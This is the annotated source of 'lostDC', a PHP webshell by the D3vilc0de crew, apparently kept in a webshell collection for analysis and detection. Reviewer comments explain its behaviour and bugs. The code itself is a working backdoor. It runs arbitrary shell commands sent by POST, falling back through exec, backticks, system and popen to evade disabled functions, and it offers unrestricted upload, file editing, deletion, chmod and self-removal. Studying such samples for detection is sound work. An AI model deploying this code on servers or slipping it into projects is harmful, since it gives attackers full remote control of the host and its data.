<?php
/* *
 *
 * lostDC shell
 * PHP Shell scritta da lostpassword, D3vilc0de crew
 * Rilasciata sotto licenza GPL 2009/2010
 * Data rilascio: 25/12/2009 (eh si, il giorno di natale non avevo niente da fare)
 * La Shell presenta varie funzioni, ma rimane comunque in continuo aggiornamento
 *
 * [English] lostDC shell - a PHP shell written by lostpassword of the D3vilc0de
 * crew, released under the GPL, 2009/2010. Release date: 25/12/2009 ("yes, I had
 * nothing to do on Christmas day"). The shell offers several functions but is
 * still under continuous development.
 *
 * */

// ---------------------------------------------------------------------------
// NOTE(review): this file is a PHP webshell sample ("lostDC", mirrored from the
// BlackArch "webshells" collection). The comments added throughout describe
// what the code does as written, for analysis and detection work. Defects are
// pointed out, not fixed, and no behaviour has been changed.
// ---------------------------------------------------------------------------

// Wall-clock timestamp as a float (seconds + microseconds). Paired with the
// startTime constant defined right below to print the "Generation time"
// figure in the page footer. The function_exists() guard avoids a fatal
// redefinition error if this file is included into a page that already
// declares a getTime().
if (!function_exists("getTime")) {
    function getTime() {
        list($usec, $sec) = explode(" ", microtime());
        return ((float)$usec + (float)$sec);
    }
}
// Script start time; read back (as the bare constant startTime) in the footer
// to compute the page generation time.
define("startTime",getTime());

// Run a shell command and return its output as a single string.
//
// Execution is attempted, in order, through exec(), the backtick operator,
// system() with output-buffer capture, and finally popen(). $disablefunc is
// imported with "global" but is never assigned anywhere in this file, so the
// in_array() calls receive NULL: a warning (and a "not in array" result) on
// PHP 7, a TypeError on PHP 8.
//
// NOTE(review): only the exec() and system() branches consult $disablefunc;
// the backtick and popen() fallbacks do not, so disabling exec() alone does
// not stop this function from running commands. $cmd is used verbatim (no
// escaping) — the "execute" handler further down passes a raw POST value in.
if (!function_exists("shellexec")) {
    function shellexec($cmd) {
        global $disablefunc;
        $result = "";
        if (!empty($cmd)) {
            if (is_callable("exec") and !in_array("exec",$disablefunc)) {
                // exec() returns one array element per output line.
                exec($cmd,$result);
                $result = join("\n",$result);
            } elseif (($result = `$cmd`) !== FALSE) {}
            // The backtick branch above has an intentionally empty body: the
            // assignment inside the condition is the work. Backticks yield the
            // output string, NULL when there is no output or the command fails,
            // and FALSE only when the pipe itself cannot be opened — so this
            // branch is taken almost always and the two fallbacks are rarely hit.
            elseif (is_callable("system") and !in_array("system",$disablefunc)) {
                // system() writes straight to output; capture it through the
                // output buffer, then put back whatever was buffered before.
                $v = ob_get_contents();
                ob_clean();
                system($cmd);
                $result = ob_get_contents();
                ob_clean();
                echo $v;
            } elseif (is_resource($fp = popen($cmd,"r"))) {
                // Last resort: read the child's stdout in 1 KiB chunks.
                $result = "";
                while(!feof($fp)) {
                    $result .= fread($fp,1024);
                }
                pclose($fp);
            }
        }
        return $result;
    }
}

// Last four octal digits of a path's mode (e.g. "0644"), shown in the
// permissions column of the directory listing. A fileperms() failure (FALSE)
// is not handled: sprintf('%o', false) gives "0", so the column shows "0".
function getperms ($file) {
    $perm = substr(sprintf('%o', fileperms($file)), -4);
    return $perm;
}

// Format a byte count as a human-readable string with binary (1024-based)
// units and two decimals: "1.5 GB", "12.34 MB", "3 KB", "300 B".
// Returns FALSE when the input is not numeric.
if (!function_exists("view_size")) {
    function view_size($size){
        if (!is_numeric($size)) {
            return FALSE;
        } else {
            if ($size >= 1073741824) {
                /* bytes -> gigabytes, rounded to two decimals */
                $size = round($size/1073741824*100)/100 ." GB";
            } elseif ($size >= 1048576) {
                /* bytes -> megabytes */
                $size = round($size/1048576*100)/100 ." MB";
            } elseif ($size >= 1024) {
                /* bytes -> kilobytes */
                $size = round($size/1024*100)/100 ." KB";
            } else {
                /* plain bytes */
                $size = $size . " B";
            }
            return $size;
        }
    }
}

// Build the HTML "server info" panel shown under the banner: PHP version,
// host, server IP, server software, the client's Accept-Charset header,
// safe_mode / magic_quotes state and disk usage of the current directory.
//
// NOTE(review): every $_SERVER value is concatenated into HTML unescaped.
// HTTP_HOST and HTTP_ACCEPT_CHARSET are taken from request headers, so
// client-controlled header values are reflected into the page verbatim.
// safe_mode and magic_quotes_gpc no longer exist in current PHP (removed in
// 5.4 and 7.0); ini_get() then returns FALSE, which is == 0, so both always
// report "OFF" there.
function getinfo()
{
    $info = '';
    $info .= '[~]Versione PHP: ' .phpversion() .'<br />';
    $info .= '[~]Server: ' .$_SERVER['HTTP_HOST'] .'<br />';
    $info .= '[~]Indirizzo IP: ' .$_SERVER['SERVER_ADDR'] .'<br />';
    $info .= '[~]Software: ' .$_SERVER['SERVER_SOFTWARE'].'<br />';
    // Accept-Charset is rarely sent by current browsers; when absent this is
    // an undefined-index notice and an empty value.
    $info .= '[~]Charset: ' .$_SERVER['HTTP_ACCEPT_CHARSET'] . '<br />';
    // Display bug in the safe_mode line: both branches print "OFF" and only
    // the colour differs. Left as-is (behaviour preserved).
    $info .= ((ini_get('safe_mode') == 0) ? '[~]Safe Mode: <font color="#00FF33">OFF</font><br />' : '[~]Safe Mode: <font color="#FF3300">OFF</font><br />');
    $info .= ((ini_get('magic_quotes_gpc') == 0) ? '[~]Magic Quotes: <font color="#00FF33">OFF</font><br />' : '[~]Magic Quotes: <font color="#FF3300">ON</font><br />');
    if (is_callable("disk_free_space")) {
        $d = realpath(".");
        $free = disk_free_space($d);
        $total = disk_total_space($d);
        // Clamp failures (FALSE) and negative values to 0 before formatting.
        if ($free === FALSE || $free < 0) {
            $free = 0;
        }
        if ($total === FALSE || $total < 0) {
            $total = 0;
        }
        $used = $total-$free;   // computed but never displayed
        $info .= "[~]Free space: ".view_size($free)."/".view_size($total)."<br />";
    }
    return $info;
}

// Working-directory selection. The "dir" query parameter, when present, goes
// straight to chdir() — this is the shell's directory-browsing mechanism, so
// any path the web-server user can enter is accepted. Without the parameter
// the process' current working directory is used.
if (!isset ($_GET ['dir'])){
    $dir = getcwd ();
}
else {
    $dir = $_GET ['dir'];
}
// The return value of chdir() is not checked. On failure $current (below)
// stays at the previous working directory while $dir keeps the requested,
// invalid value; the listing later calls scandir($dir) but is_file()/
// filesize() relative to the real cwd, so the two can disagree.
chdir ($dir);

// Resolved current directory, and the "?dir=<path>" query-string prefix that
// every link and form in the page is built from. The path is not URL-encoded:
// directory names containing '&', '#', '?', spaces or quotes yield broken
// links and forms.
$current = getcwd ();
$c = "?dir=" . $current;

// Static page head: <title> (with the current path concatenated in, unescaped)
// and the inline stylesheet. Everything up to <body> is one double-quoted PHP
// string. "text-color" in the a.head rule is not a CSS property and is ignored
// by browsers.
$home = "<html>
<head>
<title>lostDC - ".$current."</title>
<style type=\"text/css\">
body {
color: #FFFFFF;
background-color: black;
font-family: Courier New, Verdana, Arial;
font-size: 11px;
cursor: crosshair;
}
a:link {
color: #FFFFFF;
text-decoration: none;
}
a:visited {
color: #FFFFFF;
text-decoration: none;
}
a:hover {
cursor: crosshair;
text-decoration: none;
color: #808080;
}
a.head {
text-decoration: none;
text-color: #FF0000;
}
a.head:hover {
cursor: crosshair;
text-decoration: none;
color: #FF0000;
}
table {
font-size: 11px;
}
td.list {
border: 1px solid white;
font-size: 11px;
}
td.list:hover {
background: #222;
}
#info {
font-size: 12px;
width: 50%;
margin-left: 20%;
text-align: left;
}
#foot {
font-size: 12px;
width: 65%;
margin-left: 20%;
text-align: left;
}
input:hover, textarea:hover {
background: #808080;
cursor: crosshair;
}
#perm {
color: #FF0000;
}

</style>
</head>
<body>";

// Page head plus banner: an <img> hosted on imageshack.us wrapped in a link to
// the script itself (PHP_SELF, reflected unescaped). The image is loaded by
// the operator's browser, not by the server; the URL is nevertheless a fixed
// string characteristic of this file.
print $home."<center><a href = \"".$_SERVER['PHP_SELF']."\"><img src = \"http://img367.imageshack.us/img367/9834/bannerdc2bygu.png\" border = \"none\"></a></center>";
// Info panel: current directory plus the getinfo() output.
print "<hr size=\"1\" width=\"60%\" noshade />\n<div id = \"info\">[~]Directory corrente: " . getcwd () . "<br />".getinfo()."</div>\n<hr size=\"1\" width=\"60%\" noshade />";

// Top menu. Each entry is the current "?dir=" prefix plus a "mode" value that
// the switch further down dispatches on: create, phpinfo, nopaste, execute,
// hasher, selfremove.
//
// NOTE(review): response output starts here, before any mode handler runs.
// The handlers below call header('Location: ...') after this point; that
// only takes effect when output buffering is active (output_buffering /
// ob_start). Otherwise PHP warns "headers already sent" and no redirect
// happens — the handler's side effect (write, delete, rename, ...) still does.
print "<table width = 60% height = 10% align = \"center\">\n";
print "<tr>\n";
print "<td>[ <a class = \"head\" href = '" . $c . "&mode=create'>New</a> ]</td>\n";
print "<td>[ <a class = \"head\" href = '" . $c . "&mode=phpinfo'>PHP Info</a> ]</td>\n";
print "<td>[ <a class = \"head\" href = '" . $c . "&mode=nopaste&action=ins'>No-Paste</a> ]</td>\n";
print "<td>[ <a class = \"head\" href = '" . $c . "&mode=execute'>Shell Command</a> ]</td>\n";
print "<td>[ <a class = \"head\" href = '" . $c . "&mode=hasher'>Hasher</a> ]</td>\n";
print "<td>[ <a class = \"head\" href = '" .$c . "&mode=selfremove'>Self Remove</a> ]</td>\n";
print "</tr></table><center>";

// Mode dispatcher. "mode" comes from the query string; an unset or unknown
// value falls through to the default directory listing. Every handler reads
// its parameters from $_GET / $_POST without validation and operates on
// whatever path it is given, relative to the chdir() performed above. All
// header('Location: ...') calls below are made after output has already been
// emitted (see the note above the menu).
$mode = $_GET ['mode'];
switch ($mode) {
    // edit: without a posted "new" field, show the file ("file", GET) in a
    // textarea; with one, overwrite the file with the posted text.
    case "edit":
        $file = $_GET ['file'];
        $new = $_POST ['new'];
        if (empty ($new)) {
            $fp = fopen ($file , "r");
            // For an empty file filesize() is 0; fread() with length 0 is a
            // ValueError on PHP 8 (a warning on older versions).
            $cont = fread ($fp, filesize ($file));
            // No-op: replaces a string with itself. The file body then goes
            // into the <textarea> unescaped, so content containing
            // "</textarea>" breaks out of the editor form.
            $cont = str_replace ("<textarea>" , "<textarea>" , $cont);
            print "<form action = '" . $c . "&mode=edit&file=" . $file . "' method = 'POST'>\n";
            print "File: ". $file . "<br />\n";
            print "<textarea name = 'new' rows = '25' cols = '100'>" . $cont . "</textarea><br />\n";
            print "<input type = 'submit' value = 'Edit'></form>\n";
        }
        else {
            // Truncating write. Because empty() is the switch, submitting ""
            // or "0" re-displays the editor instead of writing.
            $fp = fopen ($file , "w");
            if (fwrite ($fp , $new)) {
                header('Location: http://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'].'?dir='.$dir);
            }
            else {
                print "Impossibile editare " . $file . "<br />\n";
                echo "<a href=\"javascript:history.go(-1)\">Indietro</a><br /><br />\n";
            }
        }
        // Runs even if fopen() returned FALSE (warning / TypeError).
        fclose ($fp);
        break;

    // upload: multipart POST from the footer form. The file is stored in the
    // current directory under its client-supplied name; basename() is the
    // only restriction — no type, size or extension checks.
    case "upload":
        $temp = $_FILES ['file'] ['tmp_name'];
        $file = basename ($_FILES ['file'] ['name']);
        if (!empty ($file)) {
            if (move_uploaded_file ($temp , $file)) {
                header('Location: http://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'].'?dir='.$dir);
            }
            else {
                print "Impossibile caricare " . $file . "\n";
                echo "<a href=\"javascript:history.go(-1)\">Indietro</a><br /><br />\n";
            }
        }
        break;

    // download: stream the path in "filename" as an attachment. The headers
    // are sent after the HTML above was already printed, so without output
    // buffering they fail and the HTML preamble precedes the file body; the
    // page footer printed after the switch is appended to it as well. The
    // filename is placed unquoted into Content-Disposition.
    case "download":
        $filename = $_GET['filename'];
        header("Pragma: no-cache");
        header("Expires: 0");
        header ( "Content-type: application/octet-stream" );
        header ( "Content-Disposition: attachment; filename=".$filename.";" );
        header ( "Content-Description: Download manager" );
        header ( "Content-Length: " . filesize ($filename) );
        readfile ($filename);
        break;

    // rename: always prints the rename form for "old" (GET); when "new" was
    // posted in the same request, renames "old" to "new".
    case "rename":
        $old = $_GET ['old'];
        print "<form action = '". $c . "&mode=rename&old=" . $old . "' method = 'POST'>\n";
        print "New name: <input name = 'new'><br />\n";
        print "<input type = 'submit' value = 'Rename'></form>\n";
        $new = $_POST ['new'];
        if (!empty ($new)) {
            if (rename ($old , $new)) {
                header('Location: http://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'].'?dir='.$dir);
            }
            else {
                print "Impossibile rinominare " . $old . ".<p>\n";
                echo "<a href=\"javascript:history.go(-1)\">Indietro</a><br /><br />\n";
            }
        }
        break;

    // chmod: footer form. "mod" is parsed as an octal string (intval(..., 8))
    // and applied to the path in "tomod".
    case "chmod":
        if (chmod($_POST['tomod'], intval($_POST['mod'], 8)) == false) {
            print "Impossibile cambiare i permessi a " .$_POST['tomod'] . "<br />";
            echo "<a href=\"javascript:history.go(-1)\">Indietro</a><br /><br />\n";
        }
        else {
            header('Location: http://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'].'?dir='.$dir);
            // print "".$_POST['tomod']." con permessi: ".intval($_POST['mod'], 8)." e' stato chmoddato\n";
        }
        break;

    // remove: unlink() the path in "file" (GET).
    case "remove":
        $file = $_GET ['file'];
        if (unlink ($file)) {
            header('Location: http://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'].'?dir='.$dir);
        }
        else {
            print "Impossibile rimuovere " . $file . " <br />\n";
            echo "<a href=\"javascript:history.go(-1)\">Indietro</a><br /><br />\n";
        }
        break;

    // selfremove: redirect into the "remove" handler with __FILE__, i.e. the
    // shell deletes its own source. Like the other redirects this depends on
    // output buffering being enabled.
    case "selfremove":
        header('Location: http://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'].'?dir='.$dir.'&mode=remove&file='.__FILE__);
        break;

    // makedir: create "dir" (POST) with mode 0777 (world-writable, subject to
    // umask), then redirect to the script with no dir parameter. The footer
    // builds this form's action as "?dir='.$c.'&mode=makedir" inside a
    // double-quoted PHP string, so the characters '. and .' are emitted
    // literally; the resulting dir value is not a real path, chdir() above
    // fails with a warning, and the directory is created relative to the
    // process' working directory instead.
    case "makedir":
        if (mkdir($_POST['dir'], 0777) == false) {
            print "Impossibile creare directory; " .$_POST['dir'] . " <br />\n";
            echo "<a href=\"javascript:history.go(-1)\">Indietro</a><br /><br />\n";
        } else {
            header('Location: http://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']);
        }
        break;

    // godir: chdir() to the posted path (affects only this request) and then
    // redirect to "?dir=<current>/<goto>" — the chdir() result is not used.
    // The footer form has the same '.$c.' quoting problem as makedir.
    case "godir":
        $goto = $_POST['goto'];
        if (isset($_POST['goto'])) {
            chdir($goto);
            header('Location: http://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'].$c.'/'.$goto);
        } else {
            header('Location: http://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']);
        }
        break;

    // elimina ("delete"): attempt to remove the directory in "dire" (GET)
    // together with its contents.
    // NOTE(review): broken as written. The listing passes "&dire=<name>" with
    // no trailing slash, but entries are joined as $dire.$file with no
    // separator, so is_dir()/rmdir()/unlink() are applied to mis-joined
    // paths; delete_directory(), called for non-empty subdirectories, is not
    // defined anywhere in this file (fatal "undefined function"); and $array
    // is never used. In practice only the final rmdir($dire) does anything,
    // and only for an already-empty directory. readdir() is compared with !=
    // rather than !==, so an entry named "0" would end the loop early.
    case "elimina":
        $dire = $_GET['dire'];
        if ($handle = opendir($dire)) {
            $array = array();
            while (false != ($file = readdir($handle))) {
                if ($file != "." && $file != "..") {
                    if(is_dir($dire.$file)) {
                        if(!rmdir($dire.$file)) {
                            delete_directory($dire.$file.'/');
                        }
                    }
                    else {
                        unlink($dire.$file);
                    }
                }
            }
            closedir($handle);
            rmdir($dire);
        }
        header('Location: http://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'].'?dir='.$dir);
        break;

    // create: create (or truncate) an empty file named by "new" (POST). The
    // error message prints $file, which is unset in this branch (presumably
    // $new was meant), and fclose() runs even when fopen() returned FALSE.
    // Without a posted value a small (mis-nested, <tr> outside a <table>)
    // form is printed.
    case "create":
        $new = $_POST ['new'];
        if (isset($_POST['new'])) {
            if (!empty ($new)) {
                if ($fp = fopen ($new, "w")){
                    header('Location: http://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'].'?dir='.$dir);
                }
                else {
                    print "Impossibile creare " . $file . ".<p>\n";
                    echo "<a href=\"javascript:history.go(-1)\">Indietro</a></center><br /><br />\n";
                }
                fclose ($fp);
            }
        }
        else {
            print "<form action = '" . $c . "&mode=create' method = 'POST'>\n";
            print "<tr><td>New file: <input name = 'new'></td>\n";
            print "<td><input type = 'submit' value = 'Create'></td></tr></form>\n";
        }
        break;

    // nopaste: a minimal paste-bin stored as plain files in the current
    // directory. action=ins prints the form and, when title/language/source
    // are all posted, writes them to a file named by rand(1000000, 9999999)
    // (not a CSPRNG; an existing file of that name is silently overwritten)
    // and redirects to action=view. The form tag is malformed (`<form action
    // '...'` lacks the "=") and its action omits mode=nopaste. action=view
    // opens the path in "id" — any path, not just a paste — and prints it
    // through htmlentities(), the only escaped output in this file.
    case "nopaste":
        switch ($_GET ['action']) {
            case "ins":
                print "<form action '" . $c . "&action=ins' method = 'POST'>\n";
                print "Title: <input type = 'text' name = 'title'><br />\n";
                print "Language: <input type = 'text' name = 'language'><br />\n";
                print "Script: <br /><textarea name = 'source' rows = '30' cols = '50'></textarea><br />\n";
                print "<input type = 'submit' value = 'Submit'></form>\n";
                if (!empty ($_POST ['title']) && !empty ($_POST ['language']) && !empty ($_POST ['source']))
                {
                    $file = rand (1000000, 9999999);
                    $fp = fopen ($file, "w");
                    fwrite ($fp, $_POST ['title'] . "\n" . $_POST ['language'] . "\n\n" . $_POST ['source']);
                    fclose ($fp);
                    // Relative Location header, unlike the absolute ones elsewhere.
                    header ("Location: {$c}&mode=nopaste&action=view&id={$file}");
                }
                break;
            case "view":
                $id = $_GET ['id'];
                $fp = fopen ($id, "r");
                // Same fread(..., 0) issue as "edit" for an empty file.
                $read = fread ($fp, filesize ($id));
                print "<table border = '1'>\n<tr>\n<td>\n<pre>" . htmlentities ($read) . "</pre></td>\n</tr>\n</table>\n";
                fclose ($fp);
                break;
        }
        break;

    // execute: the command prompt. A posted "command" is handed unmodified to
    // shellexec() above; the command and its output are echoed back inside
    // <textarea>s unescaped (output containing "</textarea>" breaks the page).
    // An empty result is reported as "command cannot be executed on this
    // server", which also covers commands that simply produced no output.
    case "execute":
        $command = $_POST ['command'];
        if (!isset ($_POST['command'])) {
            print "<table>\n<form action = '" . $c . "&mode=execute' method = 'POST'>\n";
            print "<tr>\n<td><input type = 'text' name = 'command'></td>\n</tr>\n";
            print "<tr>\n<td><input type = 'submit' value = 'Execute'></td>\n</tr>\n</form>\n</table>";
        }
        else {
            $ret = shellexec($command);
            if ($ret == "") {
                print "Il comando non puo' essere eseguito sul server<br /><br /><br />\n";
            }
            else {
                print "Executing the following command:<br />\n";
                print "<textarea rows = '5' cols = '60'>".$command."</textarea><br />\n";
                print "Result:<br /> <textarea rows = '5' cols = '60'>".$ret."</textarea><br /><br /><br />\n";
            }
        }
        break;

    // hasher: hash($_POST['type'], $_POST['hash']). The algorithm name is
    // taken from the request, not restricted to the listed options; an
    // unknown name is a warning + FALSE on PHP 7 and a ValueError on PHP 8.
    // The input string is echoed back unescaped.
    case "hasher":
        print "<table>\n<form action = '" . $c . "&mode=hasher' method = 'POST'>\n";
        print "<tr>\n<td><input type = 'text' name = 'hash'></td>\n</tr>\n";
        print "<tr>\n<td><select name = 'type'>\n";
        print "<option>md4</option>\n";
        print "<option>md5</option>\n";
        print "<option>sha1</option>\n";
        print "<option>gost</option>\n";
        print "<option>crc32</option>\n";
        print "<option>adler32</option>\n";
        print "<option>whirlpool</option>\n";
        print "</select></td>\n</tr>";
        print "<tr>\n<td><input type = 'submit' value = 'hash'></td>\n</tr></form>\n</table>";
        if (!empty ($_POST ['hash']) && !empty ($_POST ['type'])) {
            print $_POST ['hash'] . ": " . "<b>" . hash ($_POST ['type'], $_POST ['hash']) . "</b>";
        }
        break;

    // phpinfo: full phpinfo() dump into the page.
    case "phpinfo":
        phpinfo();
        break;

    // default: directory listing of $dir. Regular files link to the download
    // handler and carry edit / remove / rename icons (images hosted on
    // imageshack.us); subdirectories link to "?dir=<current>/<name>" and carry
    // a delete icon (mode=elimina). Entry names are placed in unquoted href
    // attributes without encoding. The ".." entry is printed as a bare <td>
    // with no surrounding <tr>.
    default:
        print "<table style = \"border: 1px solid black;\" width=\"60%\">\n";
        $files = scandir ($dir);
        foreach ($files as $out) {
            // is_file()/filesize()/getperms() resolve $out against the real
            // working directory, whereas scandir() above used $dir; they only
            // diverge if chdir() failed.
            if (is_file ($out)) {

                print "<tr>\n<td width = \"55%\" class = \"list\"><a href = " .$c ."&mode=download&filename=".$out.">" . $out ."</a></td>\n";
                print "<td width = \"10%\" class = \"list\">".view_size(filesize($out))."</td>";
                print "<td class = \"list\"><div id = \"perm\">" . getperms ($out) . "</div></td>\n";
                // One string literal spanning four lines; the embedded newlines
                // are part of the output.
                print "<td class = \"list\" align = \"right\"><a href = '" . $c ."&mode=edit&file=" . $out . "'><img src = 'http://img189.imageshack.us/img189/9858/editj.gif' alt = \"edita file\" border = \"none\"></a>
<a href = '" . $c ."&mode=remove&file=" . $out . "'><img src = 'http://img193.imageshack.us/img193/9589/deletef.gif' alt = \"elimina file\" border = \"none\"></a>
<a href = '" . $c ."&mode=rename&old=" . $out . "'><img src = 'http://img51.imageshack.us/img51/7241/replyl.gif' alt = \"rinomina file\" border = \"none\"></a>
</td>\n</tr>";
            }
            else {
                if ($out != "." && $out != "..") {
                    print "<tr>\n<td width = \"55%\" class = \"list\"><a href = " . $c . "/" . $out . ">" . $out . "</a></td>\n";
                    print "<td width = \"10%\" class = \"list\">FOLDER</td>";
                    print "<td class = \"list\"><div id = \"perm\">" . getperms ($out) . "</div></td>\n";
                    print "<td class = \"list\" align = \"right\"><a href = '" . $c ."&mode=elimina&dire=" . $out . "'><img src = 'http://img193.imageshack.us/img193/9589/deletef.gif' alt = \"elimina directory\" border = \"none\"></a></td>\n</tr>";
                }
                if ($out == "..")
                    print "<td width = \"55%\" class = \"list\"><a href = " . $c . "/" . $out . ">..</a></td>\n";
            }
        }
        print "</table>\n";
}

// Page footer: upload (multipart), chmod, mkdir, create-file and go-dir forms,
// then the generation-time line and author links. This runs after every mode
// handler, including "download", so it is appended to downloaded content.
// "</hr>" is not a real closing tag (hr is void) and is ignored by browsers.
//
// The makedir and godir forms write '.$c.' inside a double-quoted PHP string,
// so the single quotes and dots are emitted literally rather than
// concatenating $c (see the makedir/godir handlers above for the effect).
// The chmod "mod" field is type="number" but the handler parses it as octal.
print "</center>\n<hr size=\"1\" width=\"60%\" noshade />";
print "\n</hr>";
print "<table id = \"foot\">
<tr>
<td width = \"40%\">
<form action = '" . $c . "&mode=upload' method = 'POST' ENCTYPE='multipart/form-data'>
Upload file: <input type = 'file' name = 'file'>
<input type = 'submit' value = 'Upload'>
</form>
</td>
<td width = \"50%\">
<form method=\"POST\" action=\"".$c."&mode=chmod\">
Chmod File: <input type=\"text\" name=\"tomod\" value = \"filename\">
<input type=\"number\" name=\"mod\" value = \"0666\">
<input type=\"submit\" name=\"submit\" value=\"Chmod\">
</form>
</td>
</tr>
<tr>
<td width = \"40%\">
<form method=\"POST\" action=\"?dir='.$c.'&mode=makedir\">
Mkdir: <input type=\"text\" name=\"dir\" value=\"namedir\">
<input type=\"submit\" name=\"submit\" value=\"Create\">
</form>
</td>
<td width = \"50%\">
<form action = '" . $c . "&mode=create' method = 'POST'>
New file: <input name = 'new'>
<input type = 'submit' value = 'Create'></form>
</td>
</tr>
<tr>
<td>
<form method = \"POST\" action = \"?dir='.$c.'&mode=godir\">
Go dir: <input name = 'goto'>
<input type = 'submit' value = 'Go'>
</form>
</td>
</tr>
</table><hr size=\"1\" width=\"60%\" noshade />\n</hr>";
// Elapsed time since the startTime constant defined at the top of the file.
print "<center>[ Generation time: ".round(getTime()-startTime,4)." seconds | by <a href=\"http://lostpassword.hellospace.net\">lostpassword</a> and <a href = \"http://www.d3vilc0de.org\">D3vilc0de crew</a> ]</center>\n</body>\n</html>";

?>